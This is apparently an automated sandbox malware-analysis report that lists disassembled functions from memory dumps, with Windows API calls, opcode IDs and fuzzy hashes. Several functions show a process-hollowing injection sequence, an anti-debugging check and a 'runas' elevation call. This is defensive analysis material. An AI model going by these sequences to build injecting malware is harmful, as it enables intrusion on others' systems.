
                                                                                                                                            Function 00414083, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 6cc94863f24da0ee58188c5d9f3ccb076fa02bd6e1a980c735fb96a40f1a85b7
                                                                                                                                            • Instruction ID: 3d095d306168320866402369d403beb1669284c2e7999e5a8039d735650467a3
                                                                                                                                            • Opcode Fuzzy Hash: 6cc94863f24da0ee58188c5d9f3ccb076fa02bd6e1a980c735fb96a40f1a85b7
                                                                                                                                            • Instruction Fuzzy Hash: EFE0A032602920819231A63B7C013EA09A5ABC933AB11037BE628861E1DF7848C7445E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02100DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E02
                                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                            • Instruction ID: ffb0ff5cdc79b8b67a99389494403b4efa5a295b2234cba712c4b6c48f0a4ea9
                                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                            • Instruction Fuzzy Hash: 93D0123114512C77D7002A94DC09BCD7B1C9F05B66F108011FB0DE91C1C7B0994046E5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405804, Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 083870d1e3a48b1bf2e23e3f4ddca2c8ef7436bb327b2443f547016b316cd463
                                                                                                                                            • Instruction ID: ebee070601532d63409d9d54d4378eb6f45d841a2a11adfd73ea16460331e925
                                                                                                                                            • Opcode Fuzzy Hash: 083870d1e3a48b1bf2e23e3f4ddca2c8ef7436bb327b2443f547016b316cd463
                                                                                                                                            • Instruction Fuzzy Hash: FC815971A101049BEB08EB28CD85BAE7A25EF41304F50463EF405AB2D2D77DDAD08F99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041531F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            • Opcode ID: 5b9b3ff5b06060b83a180fecabe560582c40c302df106cdafeb20deb20b3fa96
                                                                                                                                            • Instruction ID: 1d6aca65bcf3e25318dfe7d7095636701c7e0c87e9e1967b12b01852e40d3c12
                                                                                                                                            • Opcode Fuzzy Hash: 5b9b3ff5b06060b83a180fecabe560582c40c302df106cdafeb20deb20b3fa96
                                                                                                                                            • Instruction Fuzzy Hash: 5F111871A0420AAFCB05DF58E941ADB7BF5EF48304F05406AF809EB351D671D911CB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004112BB, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5c5f12808fd1821e45b476d7ed57b6dfec51555f21093e67fbf8b16c83a431e2
                                                                                                                                            • Instruction ID: 80a9df45b838dafa3a6e559d3be64c252a5d324c26abc19f2e2e4166300fd196
                                                                                                                                            • Opcode Fuzzy Hash: 5c5f12808fd1821e45b476d7ed57b6dfec51555f21093e67fbf8b16c83a431e2
                                                                                                                                            • Instruction Fuzzy Hash: E5F02632501A1496E620372B88017DA27998F82338F10071BFA34925E1DA7C958285AE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041DEA3, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004159AA: RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            • _free.LIBCMT ref: 0041DEC3
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 314386986-0
                                                                                                                                            • Opcode ID: 75979e60e8d377ee3e38a78a60ab10f363bdde8bc077e65c95eff49ab7553149
                                                                                                                                            • Instruction ID: 693dcdf69e3471f98c961023fc9d25f82c8ee01505acb6ddceb309d9356b465f
                                                                                                                                            • Opcode Fuzzy Hash: 75979e60e8d377ee3e38a78a60ab10f363bdde8bc077e65c95eff49ab7553149
                                                                                                                                            • Instruction Fuzzy Hash: 0BF06272505B00DFD3349F45D801792F7FCEF91722F10842FE29A8B591DAB8A4858B59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041C770, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: d563dfaa9303f0cbcc920a190e9eded9226704e132240de5d493fcab5f594bc8
                                                                                                                                            • Instruction ID: 5d3ef887da8b63e3444176331524ca0bdbdc0af9896b585ac3d134a1cc739f81
                                                                                                                                            • Opcode Fuzzy Hash: d563dfaa9303f0cbcc920a190e9eded9226704e132240de5d493fcab5f594bc8
                                                                                                                                            • Instruction Fuzzy Hash: D7D06C3210014DBBDF128F84DC06EDA3BAAFB48754F014010BA1856120C732E832AB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02100920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02100929
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 560597551-0
                                                                                                                                            • Opcode ID: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
                                                                                                                                            • Instruction ID: 81cc2d85be0b363c656950924f38b6f44aec89e449adb5a9cb9224a94380d57e
                                                                                                                                            • Opcode Fuzzy Hash: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
                                                                                                                                            • Instruction Fuzzy Hash: 8B90047034415C11DD3435DC0C11F0501015745774F3007317130DD1D4DC4055003315
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 004020D0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 004020EC
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00402145
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0040215E
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00402173
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00402196
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 004021AE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021B5
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 004021D4
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 004021EF
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040222C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0040225C
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00402272
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040227B
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00402289
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 004022A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                            • API String ID: 4033543172-1050664331
                                                                                                                                            • Opcode ID: 04ab5baca73f1d7fada38baaa7b89abcd72bdfc087db488689baa73d6d6d751b
                                                                                                                                            • Instruction ID: 0e71f42fb7cc77d9bd943e6b41bda9a6dc082800e3d645ecc03e48e1ba3a0098
                                                                                                                                            • Opcode Fuzzy Hash: 04ab5baca73f1d7fada38baaa7b89abcd72bdfc087db488689baa73d6d6d751b
                                                                                                                                            • Instruction Fuzzy Hash: BA515971A40304BFDB208BA4DC85FAABBB8FF08705F940065F609EA2D0D7B5A955DB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02102320, Relevance: 22.7, APIs: 15, Instructions: 155injectionthreadmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0210233C
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 02102395
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 021023AE
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 021023C3
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 021023E6
                                                                                                                                            • GetModuleHandleA.KERNEL32(0042BCFC,0042BCE4,?,00000000,00000000), ref: 021023FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02102405
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 02102424
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0210243F
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0210247C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 021024AC
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 021024C2
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 021024CB
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 021024D9
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 021024F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033543172-0
                                                                                                                                            • Opcode ID: 9ece6e837acb4fa59888a1e4d99704a2eb9bd6168bebd7b156679880e24fc275
                                                                                                                                            • Instruction ID: 53d242d701e0762a509de5b03606d46c3cf17097e5aa624aa23c71e9e429fb42
                                                                                                                                            • Opcode Fuzzy Hash: 9ece6e837acb4fa59888a1e4d99704a2eb9bd6168bebd7b156679880e24fc275
                                                                                                                                            • Instruction Fuzzy Hash: DA515C71B40304BFEB209B94DC85FAABBB8FF08705F904025FA09E61D0D7B5A955DB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00403C30, Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403C86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 209486ba1ab70bc4b47f221b73ef8462f8ca94ae43bc4868a889ca66473e6326
                                                                                                                                            • Instruction ID: fc88b0bca923a07532a6eb78641dceaa207a15a50886e6470e9b438ae10ccdb1
                                                                                                                                            • Opcode Fuzzy Hash: 209486ba1ab70bc4b47f221b73ef8462f8ca94ae43bc4868a889ca66473e6326
                                                                                                                                            • Instruction Fuzzy Hash: 3E61E271E092089BEB20DF69DC457ADBBB9EB05316F5002BBD804A73C0E7794A8487C9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02113B98, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02113C90
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02113C9A
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 02113CA7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 19449bc542352132481959d704c5729f1a67276622b0d3b4a61f36b47e3d8f04
                                                                                                                                            • Instruction ID: dd1efc89bb670abb5476e4cafe0d077195d7ba61027a90424838ed2b29721755
                                                                                                                                            • Opcode Fuzzy Hash: 19449bc542352132481959d704c5729f1a67276622b0d3b4a61f36b47e3d8f04
                                                                                                                                            • Instruction Fuzzy Hash: 1531C57494122C9BCB21DF64D889BCCBBB8BF08310F5041EAE41DA7290EB709B858F49
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00413948, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00413A40
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00413A4A
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00413A57
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 1b58fb1c12a4467edf4b1aa6b652b91fceb493b3b189146260a7fecfde64fd15
                                                                                                                                            • Instruction ID: 6175a4c4d39221674b44a327f0cd8fe6ae741a78192ccc9b53f76126df92d1ad
                                                                                                                                            • Opcode Fuzzy Hash: 1b58fb1c12a4467edf4b1aa6b652b91fceb493b3b189146260a7fecfde64fd15
                                                                                                                                            • Instruction Fuzzy Hash: A731C7749112289BCB21DF25D889BDDB7B4BF08350F5042EAE81CA7290E7749F858F48
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02102AF0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02102B5D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                            • String ID: runas
                                                                                                                                            • API String ID: 587946157-4000483414
                                                                                                                                            • Opcode ID: cac966d2bf474052de4b10d5538af56f3b49909b61f604ea8ac80a2de9d61eb6
                                                                                                                                            • Instruction ID: dd726d7c7dfc838aaa7c365466c40d0c39d9c719489897e04ae2c1064f0b0a2c
                                                                                                                                            • Opcode Fuzzy Hash: cac966d2bf474052de4b10d5538af56f3b49909b61f604ea8ac80a2de9d61eb6
                                                                                                                                            • Instruction Fuzzy Hash: 8851BF70640108AFEB08DF69C989BDE3BB6EF45344F608518F8155B2C1D7B5DA85CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F0E2, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F0F8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                            • Opcode ID: 9a16e6b3537ab6a5d70db438d3569bca73a4d7438c2ef73918bf6350fb7104d5
                                                                                                                                            • Instruction ID: 76c870dfcaa0d5386070ff42ca5ffd1877ca7c4e041d8fc5b39dd7e4b2a8d15d
                                                                                                                                            • Opcode Fuzzy Hash: 9a16e6b3537ab6a5d70db438d3569bca73a4d7438c2ef73918bf6350fb7104d5
                                                                                                                                            • Instruction Fuzzy Hash: 89519FB1A01615CBEB24CF65D9847AEB7F0FB44314F6481BAC401EB790D3799D0ACB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F427, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000F433,0040EF2C), ref: 0040F42C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 97825d8f26a605acf6a58983a0c89bdbf7a4cab852a816e77a0367ca63f625b4
                                                                                                                                            • Instruction ID: 36f1e7d1efaa85132187ba7e203d996d3109dfa99066f70058f5a9ce8acd492e
                                                                                                                                            • Opcode Fuzzy Hash: 97825d8f26a605acf6a58983a0c89bdbf7a4cab852a816e77a0367ca63f625b4
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211BC3B, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0211BC7F
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B835
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B847
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B859
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B86B
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B87D
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B88F
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8A1
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8B3
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8C5
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8D7
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8E9
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8FB
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B90D
                                                                                                                                            • _free.LIBCMT ref: 0211BC74
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211BC96
                                                                                                                                            • _free.LIBCMT ref: 0211BCAB
                                                                                                                                            • _free.LIBCMT ref: 0211BCB6
                                                                                                                                            • _free.LIBCMT ref: 0211BCD8
                                                                                                                                            • _free.LIBCMT ref: 0211BCEB
                                                                                                                                            • _free.LIBCMT ref: 0211BCF9
                                                                                                                                            • _free.LIBCMT ref: 0211BD04
                                                                                                                                            • _free.LIBCMT ref: 0211BD3C
                                                                                                                                            • _free.LIBCMT ref: 0211BD43
                                                                                                                                            • _free.LIBCMT ref: 0211BD60
                                                                                                                                            • _free.LIBCMT ref: 0211BD78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: B
                                                                                                                                            • API String ID: 161543041-2386870291
                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: b907e6c4b5374378ac3b10f304774c24b7c2c5e1061e22ee3c6bdb69f5674753
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: 62315C31688304EFEF34AA39EC85B5A73EBAF40358FA44439E055DB150DF35EA418B10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B9EB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0041BA2F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5E5
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5F7
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B609
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B61B
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B62D
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B63F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B651
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B663
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B675
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B687
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B699
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6AB
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6BD
                                                                                                                                            • _free.LIBCMT ref: 0041BA24
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041BA46
                                                                                                                                            • _free.LIBCMT ref: 0041BA5B
                                                                                                                                            • _free.LIBCMT ref: 0041BA66
                                                                                                                                            • _free.LIBCMT ref: 0041BA88
                                                                                                                                            • _free.LIBCMT ref: 0041BA9B
                                                                                                                                            • _free.LIBCMT ref: 0041BAA9
                                                                                                                                            • _free.LIBCMT ref: 0041BAB4
                                                                                                                                            • _free.LIBCMT ref: 0041BAEC
                                                                                                                                            • _free.LIBCMT ref: 0041BAF3
                                                                                                                                            • _free.LIBCMT ref: 0041BB10
                                                                                                                                            • _free.LIBCMT ref: 0041BB28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: pB
                                                                                                                                            • API String ID: 161543041-3059159000
